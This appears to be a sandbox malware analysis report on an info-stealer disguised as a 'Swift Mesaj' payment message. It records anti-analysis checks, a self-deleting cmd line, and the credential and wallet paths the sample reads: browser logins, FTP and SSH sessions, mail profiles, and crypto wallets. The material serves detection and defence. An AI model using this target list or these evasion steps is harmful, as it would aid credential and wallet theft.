Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-crt-environment-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-synch-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-rtlsupport-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-processthreads-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-sysinfo-l1-1-0.dll Jump to dropped file
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF06AF rdtsc 1_2_02AF06AF
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_004065C5 FindFirstFileW,FindClose, 1_2_004065C5
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405990
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00402862 FindFirstFileW, 1_2_00402862
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe API call chain: ExitProcess graph end node
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060176873.0000000001825000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Swift Mesaj#U0131#09971.exe, 00000001.00000002.7936499065.0000000010059000.00000004.00000800.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8062093051.0000000003359000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW9^
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_10001B18
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF06AF rdtsc 1_2_02AF06AF
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AFC4B4 mov eax, dword ptr fs:[00000030h] 1_2_02AFC4B4
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF688B mov eax, dword ptr fs:[00000030h] 1_2_02AF688B
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B1345E mov eax, dword ptr fs:[00000030h] 1_2_02B1345E
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF692A mov eax, dword ptr fs:[00000030h] 1_2_02AF692A
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02AF6927 mov eax, dword ptr fs:[00000030h] 1_2_02AF6927
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B11118 mov eax, dword ptr fs:[00000030h] 1_2_02B11118
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_02B0FF3F CreateFileA,LdrLoadDll, 1_2_02B0FF3F
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Swift Mesaj#U0131#09971.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Code function: 1_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403373

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000003.8040635695.000000001D9B8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.8078319161.000000001D460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.8040702551.000000001D9BC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172, type: MEMORYSTR
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: %APPDATA%\Exodus\
Source: Swift Mesaj#U0131#09971.exe, 00000004.00000002.8060628041.000000000185A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2ce63c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c94d2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.Swift Mesaj#U0131#09971.exe.1e2c38e3.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.8078519186.000000001D570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Swift Mesaj#U0131#09971.exe PID: 3172, type: MEMORYSTR